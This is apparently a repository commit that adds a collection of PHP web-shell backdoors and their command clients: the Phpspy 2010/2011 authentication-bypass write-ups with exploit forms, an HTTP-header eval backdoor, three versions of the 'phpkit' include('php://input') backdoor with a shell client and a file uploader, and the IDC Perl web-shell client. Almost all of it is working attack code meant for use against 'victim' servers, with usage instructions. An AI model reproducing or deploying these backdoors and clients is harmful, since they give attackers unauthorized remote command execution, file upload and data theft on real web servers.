update

php shell and jsp shell

php/Phpspy 2010 身份验证绕过漏洞

@@ -0,0 +1,28 @@
+Phpspy 2010 身份验证绕过漏洞
+作者：我不知道该唱什么 发布时间：April 17, 2011 00:21:28 分类：tech
+
+
+利用代码：
+
+<form method="POST" action="http://mirc.3est.com/1.php">
+<input type="hidden" name="admin['pass']" value="1">
+<input type="submit" value="Login">
+</form>
+
+在每次向shell请求数据的时候 都附加post一个admin['pass']即可。
+形成原因：
+2009不存在该洞，仅限2010版本，对比二者即可得到答案：
+利用
+
+foreach(array('_GET','_POST') as $_request) {
+foreach($$_request as $_key => $_value) {
+if ($_key{0} != '_') {
+if (IS_GPC) {
+$_value = s_array($_value);
+}
+$$_key = $_value;
+}
+}
+}
+
+对变量$admin['pass']进行覆盖。

php/Phpspy 2011 继续身份验证绕过漏洞

@@ -0,0 +1,43 @@
+Phpspy 2011 继续身份验证绕过漏洞
+作者：我不知道该唱什么 发布时间：May 1, 2011 14:58:54 分类：tech
+
+官方目前下载已经修补上了 目前官方下载是2011.php， 文件名为2011ok.php的是带洞版本。
+
+鄙视转载不留版权的，特别鄙视下那个什么hack情
+http://hi.baidu.com/5427518 / http://www.hackqing.com/
+我曾经还以为他是个人物。
+
+今天m0r5和我说phpspy2011 我都不知道2011出来了  - - 就下下来看看
+
+发现2011有不少借鉴WSO Shell的地方，看到$pass还是在那个函数的上面，但是验证成功过后用了一个Location重定向了一下，之后会再次检查一次cookies。
+
+但是想不明白作者为什么这样做，和2010的原理一样，一样绕过：
+
+下面给出一个更为直接的利用方法，上传你自己的新shell：
+
+<form method="POST" action="http://www.hackshell.net/2011ok11.php">
+<input name="password" type="text" size="20" value="hackshell_net">
+<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
+<input type="hidden" name="action" value="login">
+<input type="submit" value="Login"></form>
+
+点击Login，这步点登录后 是登录界面  继续操作下一步：
+<form method="POST" action="http://www.hackshell.net/2011ok.php">
+<input name="password" type="text" size="20" value="hackshell_net">
+<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
+<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
+
+密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径，
+然后访问：
+<form action="http://www.hackshell.net/2011ok.php" method="POST" enctype="multipart/form-data">
+<input name="password" type="password" size="20">
+<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
+
+<input name="uploadfile" value="" type="file">
+<input name="doupfile" value="Upload" type="submit">
+<input name="uploaddir" value="D:/workspace/" type="hidden">
+<input name="dir" value="D:/workspace/" type="hidden">
+</form>
+
+
+其中把iploaddir的value改为phpinfo中看到的路径，上传shell。

php/php-sh/client.py

@@ -0,0 +1,41 @@
+#!/usr/bin/python
+# Client for the backdoor which
+# uses HTTP CODE header for inserting code
+# Got the idea after seeing this sort of payload
+# dropped by a phpmyadmin exploit on rdot :)
+# Is also good to learn how to use urllib
+# and not be lazy arse with requests all of time!
+# Insecurety Research (2013) - insecurety.net
+import urllib2
+import sys
+
+def usage(program):
+    print "HTTP CODE Header Backdoor Command Shell"
+    print "Usage: %s <Backdoor URL>" %(program)
+    print "Example: %s http://www.test.com/webshell.php" %(program)
+    sys.exit(0)
+
+def main(args):
+    try:
+        if len(args) < 2:
+            usage(args[0])
+
+        print "[+] Using %s as target" %(args[1])
+        print "[!] Popping a shell, type 'exit' to quit"
+        while True:
+            opener = urllib2.build_opener()
+            url = args[1]
+            cmd = raw_input('~$ ')
+            if cmd == "exit":
+                sys.exit(0)
+            else:
+                code = "system('%s');" %(cmd)
+                opener.addheaders.append(('Code', code))# %(str(code))
+                urllib2.install_opener(opener)
+                result = urllib2.urlopen(url).read()
+                print result
+    except Exception, e:
+        print e
+
+if __name__ == "__main__": 
+    main(sys.argv)

php/php-sh/server.php

@@ -0,0 +1,3 @@
+<?php
+eval(getenv('HTTP_CODE'));
+?>

php/phpkit-0.1a/README

@@ -0,0 +1,53 @@
+ /$$$$$$$  /$$   /$$ /$$$$$$$  /$$       /$$   /$$    
+| $$__  $$| $$  | $$| $$__  $$| $$      |__/  | $$    
+| $$  \ $$| $$  | $$| $$  \ $$| $$   /$$ /$$ /$$$$$$  
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$  /$$/| $$|_  $$_/  
+| $$____/ | $$__  $$| $$____/ | $$$$$$/ | $$  | $$    
+| $$      | $$  | $$| $$      | $$_  $$ | $$  | $$ /$$
+| $$      | $$  | $$| $$      | $$ \  $$| $$  |  $$$$/
+|__/      |__/  |__/|__/      |__/  \__/|__/   \____/
+
+phpkit-0.1a
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP 
+code you happen to write. The example client, phpkit.py, simply
+gives a "shell prompt" (non interactive, each command is executed
+in a new "context") on the victim server. It is trivial to write
+pretty much anything, I have also written "upload.py" which will
+be ready for the next release, which allows uploading arbritary 
+files to the infected webserver.
+
+USAGE:
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkit.py <url to php file on server> and enjoy!
+
+Example Use:
+[infodox@sphynx:~/phpkit-0.1a]$ ./phpkit.py http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php 
+
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux yore-ma 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+shell:~$
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence. 

php/phpkit-0.1a/odd.php

@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>

php/phpkit-0.1a/phpkit.py

@@ -0,0 +1,28 @@
+#!/usr/bin/python
+# Client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twitter: @info_dox
+# Insecurety Research - 2013
+import requests
+import sys
+
+if (len(sys.argv) != 2):
+    print "Usage: " + sys.argv[0] + " <url of backdoor>"
+    print "Example: " + sys.argv[0] + " http://localhost/odd.php"
+    sys.exit(0)
+
+url = sys.argv[1]
+print "\n[+] URL in use: %s \n" %(url)
+while True:
+    cmd = raw_input("shell:~$ ")
+    if cmd == "quit":
+        print "\n[-] Quitting"
+        sys.exit(0)
+    elif cmd == "exit":
+        print "\n[-] Quitting"
+        sys.exit(0)
+    else:
+        payload = """<?php system('%s'); ?>""" %(cmd)
+        hax = requests.post(url, payload)
+        print hax.text

php/phpkit-0.2a/CHANGELOG

@@ -0,0 +1,10 @@
+Changelog of phpkit development
+--
+0.1a - 07/01 (Jan)/2013 - Initial Commit
+0.1b - 08/01 (Jan)/2013 - Major Upgrade. Now tests for system(), shell_exec() and passthru()
+                          Uses simple logic to choose the first one that works.
+                          Needs code cleanup soon, and implementation of exec() :)
+0.2a - 17/01 (Jan)/2013 - Realized I was still thinking it was January. Updated the client a bit.
+                          Preparing for the 0.2a release by finishing the upload client and writing
+                          documentation for it. Code is a lot cleaner now though. Still need to fix
+                          the bloody "test" function :/

php/phpkit-0.2a/README

@@ -0,0 +1,100 @@
+ /$$$$$$$  /$$   /$$ /$$$$$$$  /$$       /$$   /$$    
+| $$__  $$| $$  | $$| $$__  $$| $$      |__/  | $$    
+| $$  \ $$| $$  | $$| $$  \ $$| $$   /$$ /$$ /$$$$$$  
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$  /$$/| $$|_  $$_/  
+| $$____/ | $$__  $$| $$____/ | $$$$$$/ | $$  | $$    
+| $$      | $$  | $$| $$      | $$_  $$ | $$  | $$ /$$
+| $$      | $$  | $$| $$      | $$ \  $$| $$  |  $$$$/
+|__/      |__/  |__/|__/      |__/  \__/|__/   \____/
+
+phpkit-0.2a
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP 
+code you happen to write. The example client, phpkit.py, simply
+gives a "shell prompt" (non interactive, each command is executed
+in a new "context") on the victim server. It is trivial to write
+pretty much anything.
+
+This release includes a massively overhauled backdoor client, it
+tests various execution functions against the victim host before
+using whatever one works first. It is massively ugly code, but
+I intend to clean it up soonish.
+
+This release also includes a basic file uploader :)
+
+USAGE (backdoor part):
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkit.py <url to php file on server> and enjoy!
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkit.py http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php 
+
+[+] Testing system function
+[+] system() function works
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+USAGE (file uploader part):
+This assumes "odd.php" is loaded onto the victim webserver, obviously.
+You run ./upload.py <url to odd.php> <file to upload> <remote path>
+Only works if remote path is writeable. /tmp/ is always good :)
+
+Example Use:
+[infodox@sahara:~/phpkit]$ python upload.py http://localhost/odd.php /etc/passwd /tmp/pass
+[+] Uploading File
+[+] Upload should be complete
+
+So the file uploaded, now I compare MD5sums to check did it bloody well work!
+[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
+2568416e280af88f82e982efd46525a8  /etc/passwd
+[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
+2568416e280af88f82e982efd46525a8  /tmp/pass
+
+Seems legit bro ;)
+
+TODO:
+MySQL client. 
+
+
+Notes:
+In two use-cases this was shown to not function.
+Use Case A: Servers with the Suhosin PHP Hardening Patches.
+In this case, php://input and other URL inclusion vectors are rendered
+unuseable due to the protections the Suhosin patches offer. i.e. this 
+tool don't work against Suhosin patched boxes.
+
+Use Case B: Servers where php.ini is dictated by httpd.conf
+In several cases where the php.ini is specific to the HTTP daemon, 
+runtime ini directive modification is not permissable. I have 
+personally observed this behaviour on Apache thus far, however
+further testing/research is needed to find a workaround of some kind.
+
+Please report if you have any issues getting this to work. Please
+test it on a server with allow_url_include = On , then if it works,
+set allow_url_include = Off , restart httpd, and check does it work.
+If it does not work, please report using the issue tracker at
+http://code.google.com/p/insecurety-research providing details of HTTPD
+configuration so I can attempt to figure out new things :)
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence. 

php/phpkit-0.2a/odd.php

@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>

php/phpkit-0.2a/phpkit.py

@@ -0,0 +1,106 @@
+#!/usr/bin/python
+# Client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+
+import requests
+import sys
+
+if (len(sys.argv) != 2):
+    print "Usage: " + sys.argv[0] + " <url of backdoor>"
+    print "Example: " + sys.argv[0] + " http://localhost/odd.php"
+    sys.exit(0)
+    
+url = sys.argv[1]
+tester = """echo w00tw00tw00t"""
+testkey = """w00tw00tw00t"""
+print "\n[+] URL in use: %s \n" %(url)
+
+###                      ###
+# Whole Bunch of Functions #
+###                      ###
+def genphp(func, cmd):
+    if func == "system":
+        rawphp = """system('%s');""" %(cmd)
+    elif func == "shellexec":
+        rawphp = """echo shell_exec('%s');""" %(cmd)
+    elif func == "passthru":
+        rawphp = """passthru('%s');""" %(cmd)
+    elif func == "exec":
+        rawphp = """echo exec('%s');""" %(cmd)
+    encodedphp = rawphp.encode('base64')
+    payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
+    return payload
+
+def test(url, tester, testkey): # This whole function is ugly as sin
+    print "[+] Testing system()" # I need to make it tighter
+    payload = genphp('system', tester) # No, really. Look at the waste
+    r = requests.post(url, payload) # It could be TIIINY and fast!
+    if testkey in r.text:
+        print "[+] system() works, using system."
+        func = 'system'
+        return func
+    else:
+        print "[-] system() seems disabled :("
+        pass
+    print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
+    payload = genphp('shellexec', tester) # THIS COULD BE TINY
+    r = requests.post(url, payload)  # But. Coffee is lacking
+    if testkey in r.text:
+        print "[+] shell_exec() works, using shell_exec"
+        func = 'shellexec'
+        return func
+    else:
+        print "[-] shell_exec() seems disabled :("
+        pass
+    print "[+] Testing passthru()"
+    payload = genphp('passthru', tester)
+    r = requests.post(url, payload)
+    if testkey in r.text:
+        print "[+] passthru() works, using passthru"
+        func = 'passthru'
+        return func
+    else:
+        print "[-] passthru() seems disabled :("
+        pass
+    print "[+] Testing exec()"
+    payload = genphp('exec', tester)
+    r = requests.post(url, payload)
+    if testkey in r.text:
+        print "[+] exec() works, using exec"
+        func = 'exec'
+        return func
+    else:
+        print "[-] exec() seems disabled :("
+        pass
+
+###                                        ###
+# End of functions and object oriented stuff #
+###                                        ###
+
+# the main body
+func = test(url, tester, testkey)
+while True:
+    try:
+        cmd = raw_input("shell:~$ ")
+        if cmd == "quit":
+            print "\n[-] Quitting"
+            sys.exit(0)
+        elif cmd == "exit":
+            print "\n[-] Quitting"
+            sys.exit(0)
+        else:
+            try:
+                payload = genphp(func, cmd)
+                hax = requests.post(url, payload)
+                print hax.text
+            except Exception or KeyboardInterrupt:
+                print "[-] Exception Caught, I hope"
+                sys.exit(0)
+    except Exception or KeyboardInterrupt:
+        print "[-] Exception or CTRL+C Caught, I hope"
+        print "[-] Exiting (hopefully) cleanly..."
+        sys.exit(0)

php/phpkit-0.2a/upload.py

@@ -0,0 +1,34 @@
+#!/usr/bin/python
+# Upload.py
+# File Upload client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+import requests
+import sys
+
+if (len(sys.argv) != 4):
+    print "Usage: " + sys.argv[0] + " <url of backdoor> <localfile> <remotefile>"
+    print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
+    sys.exit(0)
+
+url = sys.argv[1]         
+localfile = sys.argv[2]
+remotefile = sys.argv[3]
+
+f = open(localfile, "r")
+rawfiledata = f.read()
+encodedfiledata = rawfiledata.encode('base64')
+
+phppayload = """<?php
+$f = fopen("%s", "a");
+$x = base64_decode('%s');
+fwrite($f, "$x");
+fclose($f);
+?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
+
+print "[+] Uploading File"
+requests.post(url, phppayload) # this is why I love the python requests library
+print "[+] Upload should be complete"

php/phpkit-1.0/README.txt

@@ -0,0 +1,97 @@
+ /$$$$$$$  /$$   /$$ /$$$$$$$  /$$       /$$   /$$    
+| $$__  $$| $$  | $$| $$__  $$| $$      |__/  | $$    
+| $$  \ $$| $$  | $$| $$  \ $$| $$   /$$ /$$ /$$$$$$  
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$  /$$/| $$|_  $$_/  
+| $$____/ | $$__  $$| $$____/ | $$$$$$/ | $$  | $$    
+| $$      | $$  | $$| $$      | $$_  $$ | $$  | $$ /$$
+| $$      | $$  | $$| $$      | $$ \  $$| $$  |  $$$$/
+|__/      |__/  |__/|__/      |__/  \__/|__/   \____/
+
+phpkit-1.0
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP 
+code you happen to write. The example client, phpkitcli.py, offers
+file upload and a remote shell.
+
+This release includes a massively overhauled backdoor client, it
+tests various execution functions against the victim host before
+using whatever one works first. It is massively ugly code, but
+I intend to clean it up soonish.
+
+USAGE (backdoor part):
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkitcli.py --url <url to php file on server> and enjoy!
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php 
+
+[+] Testing system function
+[+] system() function works
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+USAGE (file uploader part):
+This assumes "odd.php" is loaded onto the victim webserver, obviously.
+You run:
+./phpkitcli.py --url <url to odd.php> --lfile <file to upload> --rfile <remote path> --mode UPLOAD
+Only works if remote path is writeable. /tmp/ is always good :)
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php --mode UPLOAD --lfile /etc/passwd --rfile /tmp/pass
+[+] Uploading File
+[+] Upload should be complete
+
+So the file uploaded, now I compare MD5sums to check did it bloody well work!
+[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
+2568416e280af88f82e982efd46525a8  /etc/passwd
+[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
+2568416e280af88f82e982efd46525a8  /tmp/pass
+
+Seems legit bro ;)
+
+TODO:
+MySQL client. 
+
+
+Notes:
+In two use-cases this was shown to not function.
+Use Case A: Servers with the Suhosin PHP Hardening Patches.
+In this case, php://input and other URL inclusion vectors are rendered
+unuseable due to the protections the Suhosin patches offer. i.e. this 
+tool don't work against Suhosin patched boxes.
+
+Use Case B: Servers where php.ini is dictated by httpd.conf
+In several cases where the php.ini is specific to the HTTP daemon, 
+runtime ini directive modification is not permissable. I have 
+personally observed this behaviour on Apache thus far, however
+further testing/research is needed to find a workaround of some kind.
+
+Please report if you have any issues getting this to work. Please
+test it on a server with allow_url_include = On , then if it works,
+set allow_url_include = Off , restart httpd, and check does it work.
+If it does not work, please report using the issue tracker at
+http://code.google.com/p/insecurety-research providing details of HTTPD
+configuration so I can attempt to figure out new things :)
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence. 

php/phpkit-1.0/odd.php

@@ -0,0 +1,5 @@
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>

php/phpkit-1.0/phpkitcli.py

@@ -0,0 +1,132 @@
+#!/usr/bin/python
+import argparse
+import requests
+import sys
+
+help = """Connects to a phpkit backdoor and provides file upload or shell access"""
+parser = argparse.ArgumentParser(description=help)
+parser.add_argument("--url", help="URL of backdoor", required=True)
+parser.add_argument("--mode", help="UPLOAD or SHELL", default="SHELL")
+parser.add_argument("--lfile", help="File to Upload (full path)")
+parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
+args = parser.parse_args()
+
+url = args.url
+mode = args.mode
+localfile = args.lfile
+remotefile = args.rfile
+
+tester = """echo w00tw00tw00t"""
+testkey = """w00tw00tw00t"""
+print "\n[+] URL in use: %s \n" %(url)
+
+###                      ###
+# Whole Bunch of Functions #
+###                      ###
+def genphp(func, cmd):
+    if func == "system":
+        rawphp = """system('%s');""" %(cmd)
+    elif func == "shellexec":
+        rawphp = """echo shell_exec('%s');""" %(cmd)
+    elif func == "passthru":
+        rawphp = """passthru('%s');""" %(cmd)
+    elif func == "exec":
+        rawphp = """echo exec('%s');""" %(cmd)
+    encodedphp = rawphp.encode('base64')
+    payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
+    return payload
+
+def test(url, tester, testkey): # This whole function is ugly as sin
+    print "[+] Testing system()" # I need to make it tighter
+    payload = genphp('system', tester) # No, really. Look at the waste
+    r = requests.post(url, payload) # It could be TIIINY and fast!
+    if testkey in r.text:
+        print "[+] system() works, using system."
+        func = 'system'
+        return func
+    else:
+        print "[-] system() seems disabled :("
+        pass
+    print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
+    payload = genphp('shellexec', tester) # THIS COULD BE TINY
+    r = requests.post(url, payload)  # But. Coffee is lacking
+    if testkey in r.text:
+        print "[+] shell_exec() works, using shell_exec"
+        func = 'shellexec'
+        return func
+    else:
+        print "[-] shell_exec() seems disabled :("
+        pass
+    print "[+] Testing passthru()"
+    payload = genphp('passthru', tester)
+    r = requests.post(url, payload)
+    if testkey in r.text:
+        print "[+] passthru() works, using passthru"
+        func = 'passthru'
+        return func
+    else:
+        print "[-] passthru() seems disabled :("
+        pass
+    print "[+] Testing exec()"
+    payload = genphp('exec', tester)
+    r = requests.post(url, payload)
+    if testkey in r.text:
+        print "[+] exec() works, using exec"
+        func = 'exec'
+        return func
+    else:
+        print "[-] exec() seems disabled :("
+        pass
+
+###
+def shell(func):
+    func = test(url, tester, testkey)
+    while True:
+        try:
+            cmd = raw_input("shell:~$ ")
+            if cmd == "quit":
+                print "\n[-] Quitting"
+                sys.exit(0)
+            elif cmd == "exit":
+                print "\n[-] Quitting"
+                sys.exit(0)
+            else:
+                try:
+                    payload = genphp(func, cmd)
+                    hax = requests.post(url, payload)
+                    print hax.text
+                except Exception or KeyboardInterrupt:
+                    print "[-] Exception Caught, I hope"
+                    sys.exit(0)
+        except Exception or KeyboardInterrupt:
+            print "[-] Exception or CTRL+C Caught, I hope"
+            print "[-] Exiting (hopefully) cleanly..."
+            sys.exit(0)
+
+def upload(url, localfile, remotefile):
+    f = open(localfile, "r")
+    rawfiledata = f.read()
+    encodedfiledata = rawfiledata.encode('base64')
+    phppayload = """<?php
+    $f = fopen("%s", "a");
+    $x = base64_decode('%s');
+    fwrite($f, "$x");
+    fclose($f);
+    ?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
+
+    print "[+] Uploading File"
+    requests.post(url, phppayload) # this is why I love the python requests library
+    print "[+] Upload should be complete"
+    sys.exit(0)
+
+def main(url, localfile, remotefile, mode):
+    if mode == "UPLOAD":
+        upload(url, localfile, remotefile)
+    elif mode == "SHELL":
+        func = test(url, test, testkey)
+        shell(func)
+    else:
+        print "[-] Mode Invalid... Exit!"
+        sys.exit(0)
+
+main(url, localfile, remotefile, mode)

php/wsb/ReadMe.txt

@@ -0,0 +1,7 @@
+#Web Shell BackDoor 
+For using this tool you must follow this steps :
+1- Upload the php Agent (idc.php) into server
+2- Run the perl script (wsb.pl) on your machine
+3- Give the address of the agent to the perl script
+4- Using this username and password : user :root , pass : toor
+5- Enter Your Commands;)  

php/wsb/idc.php

@@ -0,0 +1,7 @@
+<?php
+$user="63a9f0ea7bb98050796b649e85481845"; #root
+$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
+
+if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
+{eval($_GET['idc']);}
+?>

php/wsb/wsb.pl

@@ -0,0 +1,109 @@
+#IDC php BackDoor
+#Iranian Dark Coders Team
+#WwW.IDC-TeaM.NeT
+#Coded BY M.R.S.CO 
+#We Are M.R.S.CO,N3O,UB313,Black.Hack3r
+#Friends : G3n3Rall,MR.CILILI,BlacK.King,Nafsh,b3hz4d,E2MA3N,Skote_Vahshat,Bl4ck.Viper,Mr.Xpr
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+print q (          
+
+              __          __         __          
+  |  | _|_   {_ |_  _||  |__} _  _| |  \ _  _  _ 
+  |/\|{-|_}  __}| }{-||  |__}{_|{_|{|__/{_}{_}|  
+
+                --=[Web Shell BackDoor]
+        +---++---==[Version : 1.1]
+        +---++---==[Coded by : M.R.S.CO]
+        +---++---==[WwW.IDC-TeaM.Net]
+                --=[Iranian Dark Coders Team]
+);
+use LWP::Simple;
+print "\nEnter Shell URL : "; 
+chomp($url=<STDIN>);
+
+print "\nEnter UserName : "; 
+chomp($usr=<STDIN>);
+
+print "Enter PassWord : "; 
+chomp($pass=<STDIN>);
+
+
+print "\nStart analyze shell\n";
+@fun=("system","passthru","exec","shell_exec");
+$tf="false";
+foreach(@fun)
+{
+	$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('echo www.idc-team.net');";
+	if ($source =~ m/idc-team/i){
+		print "\nConected\nFor more information Enter \"help\"";
+		do {
+			print "\nWSB : ";
+			chomp($cmd=<STDIN>);
+			if ($cmd=~"help")
+			{
+print q (
+================================================================
+
+  command     Description
+  -------    --------------------------
+  help       The help command display the help menu 
+  getuid     The 'getuid' command will display the user 
+  lpwd       display the filename of the current working directory
+  ps         The 'ps' command  display the list of running processes.
+  shell      It display the standard shell
+  dir        The 'dir' command List  information  about  the FILEs
+  download   The 'download' command downloads a file from the remote machine
+  sym        The 'sym' command create a symlink
+);
+      			}elsif ($cmd=~"getuid"){
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('id');";
+				print "\nUser id = $source";
+			}elsif ($cmd=~"dir"){
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ls -la');";
+				print "\n $source";
+      			}elsif ($cmd=~"lpwd"){
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('pwd');";
+				print "\n$source";
+			}elsif ($cmd=~"ps"){
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ps -A');";
+				print "\n$source";
+			}elsif ($cmd=~"exit"){
+				exit 0;
+			}elsif ($cmd=~"sym"){
+				print "Enter Target Path (/home/idc/public_html/config.php)\nEnter Target Path : ";
+				chomp($target=<STDIN>);
+				print "\nEnter symlink Path (/home/me/public_html/sym.txt)\nEnter symlink Path : ";
+				chomp($sym=<STDIN>);
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ln -s $target $sym');";
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\'perl -e \"symlink('$target','$sym')\"\');";
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=symlink('$target','$sym');";
+				print "\nSymlink \"$sym\" Was Created;)\n";
+			}elsif ($cmd=~"download"){
+				print "Enter File Path (/home/idc/public_html/test.zip)\nEnter File Path : ";
+				chomp($ff=<STDIN>);
+				print "\nEnter Save Path : ";
+				chomp($fp=<STDIN>);
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('cat $ff');";
+				open (fdl, '>>'.$fp);
+				print fdl "$source";
+				close (fdl); 
+				print "\File \"$ff\" Was Downloaded to $fp\n";
+			}elsif ($cmd=~"shell"){
+				$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"uname -an\");";
+				print "\n$source";
+				do {
+					print "\ncmd : ";
+					chomp($cm=<STDIN>);
+					$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"$cm\");";
+					print "\n$source";
+					if ($cm=~"exit"){goto ou;}
+				}while ($==1)  
+			}else{
+				print "\"$cmd\" Command NotFound 404;) \nFor more information Enter \"help\"";
+			}
+	ou:;
+		}while ($==1)
+	}
+$tf="true";
+}
+if($tf="true") {print "Cant connect to server !!\n";}